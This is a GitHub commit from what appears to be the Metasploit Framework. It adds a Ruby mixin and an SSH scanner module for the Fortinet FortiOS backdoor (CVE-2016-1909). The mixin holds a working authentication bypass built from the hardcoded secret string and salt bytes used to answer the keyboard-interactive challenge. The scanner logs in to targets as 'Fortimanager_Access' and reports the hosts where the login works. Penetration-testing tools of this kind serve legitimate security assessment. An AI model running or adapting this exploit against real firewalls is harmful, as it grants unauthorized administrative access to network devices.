Move Fortinet backdoor to module and mixin

rapid7 · Feb 29, 2016 · 51af295 · 51af295
1 parent 83fad3e
commit 51af295
Show file tree

Hide file tree

Showing 5 changed files with 159 additions and 96 deletions.
diff --git a/lib/msf/core/exploit/fortinet.rb b/lib/msf/core/exploit/fortinet.rb
@@ -0,0 +1,95 @@
+# -*- coding: binary -*-
+
+require 'net/ssh'
+
+module Msf::Exploit::Remote::Fortinet
+  class Net::SSH::Authentication::Methods::KeyboardInteractive < Net::SSH::Authentication::Methods::Abstract
+
+    # https://www.ietf.org/rfc/rfc4256.txt
+    def authenticate(service_name, username, password = nil)
+      debug { 'Sending SSH_MSG_USERAUTH_REQUEST' }
+
+      send_message(userauth_request(
+=begin
+        string    user name (ISO-10646 UTF-8, as defined in [RFC-3629])
+        string    service name (US-ASCII)
+        string    "keyboard-interactive" (US-ASCII)
+        string    language tag (as defined in [RFC-3066])
+        string    submethods (ISO-10646 UTF-8)
+=end
+        username,
+        service_name,
+        'keyboard-interactive',
+        '',
+        ''
+      ))
+
+      loop do
+        message = session.next_message
+
+        case message.type
+        when USERAUTH_SUCCESS
+          debug { 'Received SSH_MSG_USERAUTH_SUCCESS' }
+          return true
+        when USERAUTH_FAILURE
+          debug { 'Received SSH_MSG_USERAUTH_FAILURE' }
+          return false
+        when USERAUTH_INFO_REQUEST
+          debug { 'Received SSH_MSG_USERAUTH_INFO_REQUEST' }
+
+=begin
+          string    name (ISO-10646 UTF-8)
+          string    instruction (ISO-10646 UTF-8)
+          string    language tag (as defined in [RFC-3066])
+          int       num-prompts
+          string    prompt[1] (ISO-10646 UTF-8)
+          boolean   echo[1]
+          ...
+          string    prompt[num-prompts] (ISO-10646 UTF-8)
+          boolean   echo[num-prompts]
+=end
+          name        = message.read_string
+          instruction = message.read_string
+          _           = message.read_string
+
+          prompts = []
+
+          message.read_long.times do
+            prompt   = message.read_string
+            echo     = message.read_bool
+            prompts << [prompt, echo]
+          end
+
+          debug { 'Sending SSH_MSG_USERAUTH_INFO_RESPONSE' }
+
+          send_message(Net::SSH::Buffer.from(
+=begin
+            byte      SSH_MSG_USERAUTH_INFO_RESPONSE
+            int       num-responses
+            string    response[1] (ISO-10646 UTF-8)
+            ...
+            string    response[num-responses] (ISO-10646 UTF-8)
+=end
+            :byte,   USERAUTH_INFO_RESPONSE,
+            :long,   1,
+            :string, custom_handler(name, instruction, prompts)
+          ))
+        else
+          raise Net::SSH::Exception, "Received unexpected message: #{message.inspect}"
+        end
+      end
+    end
+
+    # http://seclists.org/fulldisclosure/2016/Jan/26
+    def custom_handler(title, instructions, prompt_list)
+      n = prompt_list[0][0]
+      m = Digest::SHA1.new
+      m.update("\x00" * 12)
+      m.update(n + 'FGTAbc11*xy+Qqz27')
+      m.update("\xA3\x88\xBA\x2E\x42\x4C\xB0\x4A\x53\x79\x30\xC1\x31\x07\xCC\x3F\xA1\x32\x90\x29\xA9\x81\x5B\x70")
+      h = 'AK1' + Base64.encode64("\x00" * 12 + m.digest)
+      [h]
+    end
+
+  end
+end
diff --git a/lib/msf/core/exploit/mixins.rb b/lib/msf/core/exploit/mixins.rb
@@ -116,3 +116,6 @@
 
 # Kerberos Support
 require 'msf/core/exploit/kerberos/client'
+
+# Fortinet
+require 'msf/core/exploit/fortinet'
diff --git a/lib/net/ssh/authentication/methods/fortinet_backdoor.rb b/lib/net/ssh/authentication/methods/fortinet_backdoor.rb
diff --git a/lib/net/ssh/authentication/session.rb b/lib/net/ssh/authentication/session.rb
@@ -7,7 +7,6 @@
 require 'net/ssh/authentication/methods/hostbased'
 require 'net/ssh/authentication/methods/password'
 require 'net/ssh/authentication/methods/keyboard_interactive'
-require 'net/ssh/authentication/methods/fortinet_backdoor'
 
 module Net; module SSH; module Authentication
 

diff --git a/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb b/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb
@@ -0,0 +1,61 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class Metasploit4 < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::Fortinet
+  include Msf::Auxiliary::Scanner
+  include Msf::Auxiliary::Report
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Fortinet Backdoor Scanner',
+      'Description'    => %q{
+        This module scans for the Fortinet backdoor.
+      },
+      'Author'         => [
+        'operator8203 <operator8203[at]runbox.com>', # PoC
+        'wvu'                                        # Module
+      ],
+      'References'     => [
+        ['CVE', '2016-1909'],
+        ['EDB', '39224'],
+        ['PACKETSTORM', '135225'],
+        ['URL', 'http://seclists.org/fulldisclosure/2016/Jan/26'],
+        ['URL', 'https://blog.fortinet.com/post/brief-statement-regarding-issues-found-with-fortios']
+      ],
+      'DisclosureDate' => 'Jan 09 2016',
+      'License'        => MSF_LICENSE
+    ))
+
+    register_options([
+      Opt::RPORT(22)
+    ])
+  end
+
+  def run_host(ip)
+    ssh = Net::SSH.start(
+      ip,
+      'Fortimanager_Access',
+      port: datastore['RPORT'],
+      auth_methods: ['keyboard-interactive']
+    )
+
+    if ssh
+      print_good("#{ip}:#{rport} - Logged in as Fortimanager_Access")
+      report_vuln(
+        :host => ip,
+        :name => self.name,
+        :refs => self.references,
+        :info => ssh.transport.server_version.version
+      )
+    end
+  end
+
+  def rport
+    datastore['RPORT']
+  end
+
+end